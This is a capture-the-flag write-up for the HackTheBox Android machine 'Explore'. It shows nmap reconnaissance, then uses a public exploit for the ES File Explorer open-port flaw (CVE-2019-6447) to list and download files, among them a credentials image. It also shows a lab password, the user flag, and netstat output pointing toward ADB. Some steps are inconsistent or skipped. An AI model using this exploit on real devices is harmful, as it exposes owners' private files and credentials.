Explore is an easy-rated Android machine from HackTheBox created by Bertolis. It was hard to find the exploit. I don't have previous experience with attacking Android machines. You can use Metasploit on this machine, but there are still alternatives to exploit the vulnerability. For privilege escalation, the only technique used is Port Forwarding. In the current post, my IP is 10.10.14.52, and the target IP is 10.129.188.159.
Gathering Information
First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
ping -c 1 10.129.188.159
Pinging 10.129.188.159 with 32 bytes of data:
Reply from 10.129.188.159: bytes=32 time=152ms TTL=63
Reply from 10.129.188.159: bytes=32 time=162ms TTL=63
Reply from 10.129.188.159: bytes=32 time=161ms TTL=63
Reply from 10.129.188.159: bytes=32 time=168ms TTL=63
Ping statistics for 10.129.188.159:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 152ms, Maximum = 168ms, Average = 160ms
The machine is working, by the "Target Description" we know that is an Android device, but without that information we can think at first glance that is a Linux Machine (TTL <= 64)
Local Terminal
nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.188.159 -oN PortScan
Nmap scan report for 10.129.188.159
Host is up, received user-set (0.16s latency).
Scanned at 2023-05-08 18:34:29 Pacific SA Standard Time for 14s
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
2222/tcp open EtherNetIP-1 syn-ack ttl 63
42135/tcp open unknown syn-ack ttl 63
42239/tcp open unknown syn-ack ttl 63
59777/tcp open unknown syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
Raw packets sent: 70480 (3.101MB) | Rcvd: 70426 (2.817MB)
Local Terminal
nmap -sCV -p 2222,42135,42239,59777 10.129.188.159 -oN WebScan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-09 11:43 Pacific SA Standard Time
Nmap scan report for 10.129.188.159
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
42239/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:32 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Tue, 09 May 2023 15:43:32 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Tue, 09 May 2023 15:43:37 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:54 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:37 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:54 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:55 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Tue, 09 May 2023 15:43:54 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<...>
Service Info: Device: phone
That's a lot of information, we are going to explore every http port first.
Browser: http://10.129.188.159:2222
Browser: http://10.129.188.159:42135/
Local Terminal
whatweb http://10.129.188:159:2222
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:2222"
whatweb http://10.129.188:159:42135
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:42135"
From the basic gathering, beside than the target being a phone, thanks to the second nmap scan, we don't have a lot of relevant information. Now we have to search information about: "Banana Studio" and "ES File Explorer" to learn about the target.
batcat exploit.py
13 │ if len(sys.argv) < 3: # Information about how to use
14 │ print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
15 │ sys.exit(1)
21 │ if cmd not in cmds: # List of available commands
22 │ print("[-] WRONG COMMAND!")
23 │ print("Available commands : ")
24 │ print(" listFiles : List all Files.")
25 │ print(" listPics : List all Pictures.")
26 │ print(" listVideos : List all videos.")
27 │ print(" listAudios : List all audios.")
28 │ print(" listApps : List Applications installed.")
29 │ print(" listAppsSystem : List System apps.")
30 │ print(" listAppsPhone : List Communication related apps.")
31 │ print(" listAppsSdcard : List apps on the SDCard.")
32 │ print(" listAppsAll : List all Application.")
33 │ print(" getFile : Download a file.")
34 │ print(" getDeviceInfo : Get device info.")
35 │ sys.exit(1)
Exploitation
All right, let's try if it works!
Local Terminal
python3 exploit.py listFiles 10.129.188.159
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : lib
time : 3/25/20 05:12:02 AM
type : folder
size : 12.00 KB (12,288 Bytes)
name : vndservice_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 65.00 Bytes (65 Bytes)
name : vendor_service_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)
name : vendor_seapp_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)
name : vendor_property_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 392.00 Bytes (392 Bytes)
<...>
It works! but there is nothing relevant here, let's try with another command.
Local Terminal
python3 exploit.py listPics 10.129.188.159
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg # Look what we found! This is interesting.
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
Perfect, we find the path of a credential related file, and in the 50070.py there is a command to download files.
Local Terminal
python3 exploit.py getFile 10.129.188.159 /storage/emulated/0/DCIM/creds.jpg
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
[+] Downloading file...
[+] Done. Saved as `out.dat`.
Local Terminal
mv out.dat out.png
display out.png
A weird way to get receive the password, now we can try to connect through ssh {kristi : Kr1sT!5h@Rp3xPl0r3!}
Local Terminal
ssh kristi@10.129.188.159 -p 2222
Unable to negotiate with 10.129.188.159 port 2222: no matching host key type found. Their offer: ssh-rsa
Nothing, this means that the flag is inside the SSD.
Target Terminal [u0_a76]
:/ $ cd sdcard
:/sdcard $ ls
Alarms DCIM Movies Notifications Podcasts backups user.txt
Android Download Music Pictures Ringtones dianxinos
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
Privilege Escalation
After exploring the whole machine, the way to solve it was by using "Port Forwarding"
Target Terminal [u0_a76]
netstat -nat
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp6 0 0 :::59777 :::* LISTEN
tcp6 0 0 ::ffff:10.129.188:44485 :::* LISTEN
tcp6 0 0 ::ffff:127.0.0.1:44491 :::* LISTEN
tcp6 0 0 :::2222 :::* LISTEN
tcp6 0 0 :::5555 :::* LISTEN
tcp6 0 0 :::42135 :::* LISTEN
tcp6 0 208 ::ffff:10.129.188.:2222 ::ffff:10.10.14.50:6518 ESTABLISHED
If we compare with nmap, there is a new working port, the "5555", by default in android devices this port is ADB, and it's running, so we can try to use it, open a new local terminal.
